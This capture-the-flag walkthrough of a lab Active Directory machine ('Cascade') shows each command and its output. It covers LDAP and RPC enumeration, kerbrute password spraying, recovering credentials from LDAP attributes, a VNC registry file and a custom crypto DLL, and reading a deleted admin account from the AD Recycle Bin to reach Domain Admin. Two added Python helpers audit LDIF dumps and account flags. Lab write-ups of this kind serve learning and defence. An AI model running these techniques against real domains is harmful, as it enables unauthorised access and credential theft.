Initial Enumeration
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ nmap -A -p- 10.129.29.246
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-05-06 18:59 CDT
Nmap scan report for 10.129.29.246
Host is up (0.0082s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-05-07 00:01:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-05-07T00:02:17
|_ start_date: 2026-05-06T23:56:22
|_clock-skew: 2s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 8.51 ms 10.10.14.1
2 8.66 ms 10.129.29.246
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.64 seconds
We got the following from the above scan:
- This is an Active Directory domain controller (host name CASC-DC1, Windows Server 2008 R2 SP1)
- Domain: cascade.local
Let's enumerate further.
We further confirm the domain with ldapsearch:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ldapsearch -x -H ldap://10.129.29.246 -s base -b "" "(objectClass=*)" namingContexts
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: namingContexts
#
#
dn:
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
As part of enumeration, I checked the cascadeLegacyPwd attribute with ldapsearch and got back Ryan Thompson's password: clk0bjVldmE=
The password seems to be base64-encoded, so let's decode it:
echo "clk0bjVldmE=" | base64 -d
We got back Ryan's plaintext password: rY4n5eva
Now that we have valid credentials, let's enumerate further with ldapsearch (the query below still uses an anonymous simple bind, which this DC allows):
──╼ [★]$ ldapsearch -x -H ldap://10.129.29.246 -b "dc=cascade,dc=local" "(cascadeLegacyPwd=*)" cascadeLegacyPwd
# extended LDIF
#
# LDAPv3
# base <dc=cascade,dc=local> with scope subtree
# filter: (cascadeLegacyPwd=*)
# requesting: cascadeLegacyPwd
#
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
cascadeLegacyPwd: clk0bjVldmE=
# search reference
ref: ldap://ForestDnsZones.cascade.local/DC=ForestDnsZones,DC=cascade,DC=local
# search reference
ref: ldap://DomainDnsZones.cascade.local/DC=DomainDnsZones,DC=cascade,DC=local
# search reference
ref: ldap://cascade.local/CN=Configuration,DC=cascade,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 5
# numEntries: 1
# numReferences: 3
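The cascadeLegacyPwd values on this page are only base64-encoded, not encrypted, so anyone who can read the attribute reads the password. As an added example (not part of the original writeup), the parser below walks an ldapsearch LDIF dump, handles folded lines and '::' values, and reports the audited attributes with their decoded plaintext; the LDIF text and the attribute list are constructed here from the entries shown on this page.

```python
import base64
import re

# Constructed sample: the two ldapsearch results shown on this page as one LDIF dump;
# the deleted-object DN is folded the way ldapsearch wraps long values (continuation
# lines start with a single space).
SAMPLE_LDIF = """\
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=TempAdmin\\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,
 DC=cascade,DC=local
sAMAccountName: TempAdmin
cascadeLegacyPwd: YmFDVDNyMWFOMDBkbGVz
"""

# Attributes to audit: this domain's custom attribute plus two standard AD
# attributes that can also hold reversible secrets.
SENSITIVE_ATTRS = ("cascadeLegacyPwd", "userPassword", "unixUserPassword")
ATTR_LINE = re.compile(r"^([A-Za-z][\w;.-]*)(::?) ?(.*)$")


def parse_ldif(text):
    """Return one {attribute: [values]} dict per LDIF entry (RFC 2849 subset:
    '#' comments, folded continuation lines and '::' base64 values)."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]          # unfold a wrapped value
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:             # trailing "" flushes the last entry
        if not line.strip():
            if current:
                entries.append(current)
            current = {}
            continue
        if line.startswith("#"):
            continue
        match = ATTR_LINE.match(line)
        if not match:
            continue
        attr, sep, value = match.groups()
        if sep == "::":                    # value was base64-wrapped by the server
            value = base64.b64decode(value).decode("utf-8", "replace")
        current.setdefault(attr, []).append(value)
    return entries


def decode_legacy_pwd(value):
    """Plaintext if value is base64 of printable ASCII, else None.
    cascadeLegacyPwd is not encrypted at all, only base64-encoded."""
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def find_legacy_passwords(ldif_text, attrs=SENSITIVE_ATTRS):
    """List (dn, attribute, plaintext-or-None) for every audited attribute present."""
    return [(entry.get("dn", [""])[0], attr, decode_legacy_pwd(value))
            for entry in parse_ldif(ldif_text)
            for attr in attrs
            for value in entry.get(attr, [])]
```

Run it over a full `ldapsearch -x ... "(cascadeLegacyPwd=*)"` dump to list every account still carrying the attribute; the deleted TempAdmin entry shows that the value survives in the Recycle Bin after the account is removed.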
I was able to get some users back with rpcclient:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ rpcclient -U "" -N 10.129.29.246
rpcclient $>
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
I further enumerated the domain with enum4linux and got back some users and domain info:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ enum4linux 10.129.29.246
ENUM4LINUX - next generation (v1.3.4)
==========================
| Target Information |
==========================
[*] Target ........... 10.129.29.246
[*] Username ......... ''
[*] Random Username .. 'pnpssmjg'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
======================================
| Listener Scan on 10.129.29.246 |
======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
=====================================================
| Domain Information via LDAP for 10.129.29.246 |
=====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: cascade.local
============================================================
| NetBIOS Names and Workgroup/Domain for 10.129.29.246 |
============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
==========================================
| SMB Dialect Check on 10.129.29.246 |
==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: false
SMB 3.1.1: false
Preferred dialect: SMB 2.1
SMB1 only: false
SMB signing required: true
============================================================
| Domain Information via SMB session for 10.129.29.246 |
============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: CASC-DC1
NetBIOS domain name: CASCADE
DNS domain: cascade.local
FQDN: CASC-DC1.cascade.local
Derived membership: domain member
Derived domain: CASCADE
==========================================
| RPC Session Check on 10.129.29.246 |
==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
====================================================
| Domain Information via RPC for 10.129.29.246 |
====================================================
[+] Domain: CASCADE
[+] Domain SID: S-1-5-21-3332504370-1206983947-1165150453
[+] Membership: domain member
================================================
| OS Information via RPC for 10.129.29.246 |
================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 7, Windows Server 2008 R2
OS version: '6.1'
OS release: ''
OS build: '7601'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null
======================================
| Users via RPC on 10.129.29.246 |
======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 15 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 15 user(s) via 'enumdomusers'
[+] After merging user results we have 15 user(s) total:
'1106':
username: arksvc
name: ArkSvc
acb: '0x00000210'
description: (null)
'1107':
username: s.smith
name: Steve Smith
acb: '0x00000210'
description: (null)
'1109':
username: r.thompson
name: Ryan Thompson
acb: '0x00000210'
description: (null)
'1111':
username: util
name: Util
acb: '0x00000210'
description: (null)
'1116':
username: j.wakefield
name: James Wakefield
acb: '0x00000210'
description: (null)
'1121':
username: s.hickson
name: Stephanie Hickson
acb: '0x00000210'
description: (null)
'1122':
username: j.goodhand
name: John Goodhand
acb: '0x00000210'
description: (null)
'1124':
username: a.turnbull
name: Adrian Turnbull
acb: '0x00000214'
description: (null)
'1127':
username: e.crowe
name: Edward Crowe
acb: '0x00000211'
description: (null)
'1128':
username: b.hanson
name: Ben Hanson
acb: '0x00000211'
description: (null)
'1129':
username: d.burman
name: David Burman
acb: '0x00000210'
description: (null)
'1130':
username: BackupSvc
name: BackupSvc
acb: '0x00000210'
description: (null)
'1134':
username: j.allen
name: Joseph Allen
acb: '0x00000210'
description: (null)
'1135':
username: i.croft
name: Ian Croft
acb: '0x00000211'
description: (null)
'501':
username: CascGuest
name: (null)
acb: '0x00000215'
description: Built-in account for guest access to the computer/domain
=======================================
| Groups via RPC on 10.129.29.246 |
=======================================
[*] Enumerating local groups
[+] Found 17 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 15 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 6 group(s) via 'enumdomgroups'
[+] After merging groups results we have 38 group(s) total:
'1102':
groupname: DnsAdmins
type: local
'1103':
groupname: DnsUpdateProxy
type: domain
'1113':
groupname: IT
type: local
'1114':
groupname: Production
type: local
'1115':
groupname: HR
type: local
'1119':
groupname: AD Recycle Bin
type: local
'1120':
groupname: Backup
type: local
'1123':
groupname: Temps
type: local
'1125':
groupname: WinRMRemoteWMIUsers__
type: local
'1126':
groupname: Remote Management Users
type: local
'1132':
groupname: Factory
type: local
'1133':
groupname: Finance
type: local
'1137':
groupname: Audit Share
type: local
'1138':
groupname: Data Share
type: local
'498':
groupname: Enterprise Read-only Domain Controllers
type: domain
'513':
groupname: Domain Users
type: domain
'514':
groupname: Domain Guests
type: domain
'515':
groupname: Domain Computers
type: domain
'517':
groupname: Cert Publishers
type: local
'520':
groupname: Group Policy Creator Owners
type: domain
'545':
groupname: Users
type: builtin
'546':
groupname: Guests
type: builtin
'553':
groupname: RAS and IAS Servers
type: local
'554':
groupname: Pre-Windows 2000 Compatible Access
type: builtin
'555':
groupname: Remote Desktop Users
type: builtin
'556':
groupname: Network Configuration Operators
type: builtin
'557':
groupname: Incoming Forest Trust Builders
type: builtin
'558':
groupname: Performance Monitor Users
type: builtin
'559':
groupname: Performance Log Users
type: builtin
'560':
groupname: Windows Authorization Access Group
type: builtin
'561':
groupname: Terminal Server License Servers
type: builtin
'562':
groupname: Distributed COM Users
type: builtin
'568':
groupname: IIS_IUSRS
type: builtin
'569':
groupname: Cryptographic Operators
type: builtin
'571':
groupname: Allowed RODC Password Replication Group
type: local
'572':
groupname: Denied RODC Password Replication Group
type: local
'573':
groupname: Event Log Readers
type: builtin
'574':
groupname: Certificate Service DCOM Access
type: builtin
=======================================
| Shares via RPC on 10.129.29.246 |
=======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
==========================================
| Policies via RPC for 10.129.29.246 |
==========================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information:
Password history length: None
Minimum password length: 5
Maximum password age: not set
Password properties:
- DOMAIN_PASSWORD_COMPLEX: false
- DOMAIN_PASSWORD_NO_ANON_CHANGE: false
- DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
- DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
- DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
Lockout observation window: 30 minutes
Lockout duration: 30 minutes
Lockout threshold: None
Domain logoff information:
Force logoff time: not set
==========================================
| Printers via RPC for 10.129.29.246 |
==========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Completed after 6.83 seconds
Let's format the domain usernames (users.txt holds the "Users via RPC" block from the enum4linux output above):
grep "username:" users.txt | awk '{print $2}' > domain_users.txt
With the list ready, let's confirm which names are valid with kerbrute:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute userenum -d cascade.local domain_users.txt --dc 10.129.29.246
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop
2026/05/06 19:34:50 > Using KDC(s):
2026/05/06 19:34:50 > 10.129.29.246:88
2026/05/06 19:34:55 > [+] VALID USERNAME: s.smith@cascade.local
2026/05/06 19:34:55 > [+] VALID USERNAME: arksvc@cascade.local
2026/05/06 19:34:55 > [+] VALID USERNAME: j.goodhand@cascade.local
2026/05/06 19:34:55 > [+] VALID USERNAME: a.turnbull@cascade.local
2026/05/06 19:34:55 > [+] VALID USERNAME: s.hickson@cascade.local
2026/05/06 19:34:55 > [+] VALID USERNAME: util@cascade.local
2026/05/06 19:34:55 > [+] VALID USERNAME: r.thompson@cascade.local
2026/05/06 19:34:55 > [+] VALID USERNAME: j.wakefield@cascade.local
2026/05/06 19:35:00 > [+] VALID USERNAME: BackupSvc@cascade.local
2026/05/06 19:35:00 > [+] VALID USERNAME: d.burman@cascade.local
2026/05/06 19:35:00 > [+] VALID USERNAME: j.allen@cascade.local
2026/05/06 19:35:00 > Done! Tested 15 usernames (11 valid) in 10.036 seconds
Out of 15 names, 11 came back valid. I then tried AS-REP roasting with GetNPUsers.py, with no luck.
Let's try the password we got for Ryan earlier against the valid names to see if there is any password re-use:
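The acb field in the enum4linux listing explains the 11-of-15 result: the four accounts with the 0x1 bit set (e.crowe, b.hanson, i.croft and CascGuest) are disabled, and kerbrute userenum only reports a name as valid when the KDC answers with a pre-authentication request, which it does not do for disabled accounts. As an added example, not part of the original writeup, the code below decodes the SAMR acb bits from that listing and, going beyond the page, the LDAP userAccountControl bits that carry the same flags under different values (TempAdmin's 66048 later on this page); the sample text is a constructed subset of the enum4linux output above.

```python
# SAMR USER_ACCOUNT bits (MS-SAMR 2.2.1.12), the values enum4linux prints as "acb".
ACB_FLAGS = {
    0x0001: "DISABLED",
    0x0002: "HOMEDIR_REQUIRED",
    0x0004: "PASSWORD_NOT_REQUIRED",
    0x0008: "TEMP_DUPLICATE",
    0x0010: "NORMAL_ACCOUNT",
    0x0020: "MNS_LOGON",
    0x0040: "INTERDOMAIN_TRUST",
    0x0080: "WORKSTATION_TRUST",
    0x0100: "SERVER_TRUST",
    0x0200: "DONT_EXPIRE_PASSWORD",
    0x0400: "AUTO_LOCKED",
}
# The same properties in LDAP userAccountControl use different bit values;
# TempAdmin's "userAccountControl : 66048" later on this page is 0x10200.
UAC_FLAGS = {0x0002: "ACCOUNTDISABLE", 0x0020: "PASSWD_NOTREQD",
             0x0200: "NORMAL_ACCOUNT", 0x10000: "DONT_EXPIRE_PASSWORD"}

# Constructed sample: four of the fifteen entries from the enum4linux listing above.
ENUM4LINUX_USERS = """\
'1106':
  username: arksvc
  name: ArkSvc
  acb: '0x00000210'
'1124':
  username: a.turnbull
  acb: '0x00000214'
'1127':
  username: e.crowe
  acb: '0x00000211'
'501':
  username: CascGuest
  acb: '0x00000215'
"""

def decode_flags(value, table):
    """Names of the bits set in value, plus any bit the table does not know."""
    names = [name for bit, name in table.items() if value & bit]
    unknown = value & ~sum(table)
    return names + ([f"UNKNOWN_0x{unknown:x}"] if unknown else [])

def parse_users(text):
    """Map username -> integer acb from enum4linux's 'Users via RPC' block."""
    users, current = {}, None
    for line in text.splitlines():
        key, _, value = line.strip().partition(":")
        if key == "username":
            current = value.strip()
        elif key == "acb" and current:
            users[current] = int(value.strip().strip("'"), 16)
    return users

def enabled_users(text):
    """Accounts without the DISABLED bit: the only ones a KDC asks pre-auth for,
    so this is the set kerbrute userenum can ever report as VALID USERNAME."""
    return sorted(u for u, acb in parse_users(text).items() if not acb & 0x0001)

def weak_accounts(text):
    """Enabled accounts whose password never expires or is not required at all."""
    return {u: decode_flags(acb, ACB_FLAGS) for u, acb in parse_users(text).items()
            if not acb & 0x0001 and acb & (0x0004 | 0x0200)}
```

Feeding the full listing from the page into parse_users gives 11 enabled accounts, matching kerbrute's count, and every one of them carries DONT_EXPIRE_PASSWORD, which is the hygiene finding a defender would raise from this output.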
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute passwordspray -d cascade.local --dc 10.129.29.246 valid_names.txt "rY4n5eva"
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop
2026/05/06 20:22:23 > Using KDC(s):
2026/05/06 20:22:23 > 10.129.29.246:88
2026/05/06 20:22:36 > [+] VALID LOGIN: r.thompson@cascade.local:rY4n5eva
2026/05/06 20:22:43 > Done! Tested 11 logins (1 successes) in 20.084 seconds
This confirms there is no password re-use and that Thompson's password is valid, so we have our first set of credentials: r.thompson:rY4n5eva
I tried to get onto the host with evil-winrm and RDP with no luck, so I checked which shares this user has READ access to via crackmapexec:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ crackmapexec smb 10.129.29.246 -u 'r.thompson' -p 'rY4n5eva' --shares
SMB 10.129.29.246 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.29.246 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SMB 10.129.29.246 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.29.246 445 CASC-DC1 Share Permissions Remark
SMB 10.129.29.246 445 CASC-DC1 ----- ----------- ------
SMB 10.129.29.246 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.29.246 445 CASC-DC1 Audit$
SMB 10.129.29.246 445 CASC-DC1 C$ Default share
SMB 10.129.29.246 445 CASC-DC1 Data READ
SMB 10.129.29.246 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.29.246 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.129.29.246 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.29.246 445 CASC-DC1 SYSVOL READ Logon server share
r.thompson has READ access on Data, so let's connect to that share with smbclient and start enumerating.
During enumeration, I found Meeting_Notes_June_2018.html in the IT folder. After downloading it, I found a new username in the note, TempAdmin; the note says the TempAdmin user has the same rights as the domain admin account.
Further enumeration revealed another file, VNC Install.reg, in the s.smith folder. I downloaded it and found that the registry export contains a TightVNC encrypted password.
Running a TightVNC decryptor on those hex bytes yields the password: sT333ve2
Let's confirm whether the password is valid with kerbrute:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute passwordspray -d cascade.local --dc 10.129.29.246 valid_names.txt "sT333ve2"
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop
2026/05/06 21:18:27 > Using KDC(s):
2026/05/06 21:18:27 > 10.129.29.246:88
2026/05/06 21:18:37 > [+] VALID LOGIN: s.smith@cascade.local:sT333ve2
2026/05/06 21:18:47 > Done! Tested 11 logins (1 successes) in 20.096 seconds
We get s.smith back as the valid owner of the newly found password: sT333ve2
Now that we have another user, I tried to get a shell with evil-winrm, and it was successful.
Let's keep enumerating. I logged into SMB with the newly found credentials for further enumeration.
I found a DB folder, and inside it Audit.db, so I downloaded it and opened it with sqlite3 on my local system.
I found the service account credentials for ArkSvc. The string BQO5l5Kj9MdErXx6Q6AGOw== is definitely encrypted or encoded, and since it is stored in a database alongside a custom crypto DLL (CascCrypto.dll), it is likely encrypted with a hardcoded key.
Reading up on how to recover the key, I found that the decryption logic is most likely hidden inside CascCrypto.dll, so I went hunting for CascCrypto.dll.
Going back to SMB, CascCrypto.dll sits in the same folder as the DB, so I downloaded it.
I ran the command below to pull out the string needed for decoding:
strings -e l CascCrypto.dll
I got the string 1tdyjCbY1Ix49842 back. After a lot of reading, I was finally able to decrypt the string and got back the plaintext password: w3lc0meFr31nd
We have another set of credentials: ArkSvc:w3lc0meFr31nd
I was able to get a shell with the newly found password.
Remember the Meeting_Notes_June_2018.html we saw on the SMB share earlier, which talks about TempAdmin. With the newly found ArkSvc credentials, and because the ArkSvc user is a member of CASCADE\AD Recycle Bin, let's check whether we can find the TempAdmin account in the recycle bin; if we can, we may get its password back as well:
PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'isDeleted -eq $true -and name -like "*TempAdmin*"' -IncludeDeletedObjects -Properties *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : TempAdmin@cascade.local
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
We found cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz for TempAdmin. The string looks like base64, so let's decode it. The decoded plaintext is baCT3r1aN00dles
Remember this phrase from the meeting note: "Username is TempAdmin (password is the same as the normal admin account password)."
So the TempAdmin credentials carry the same rights as the Domain Admin. Let's try to get onto the host with TempAdmin:baCT3r1aN00dles
We are Domain Admin.. Game over!!!!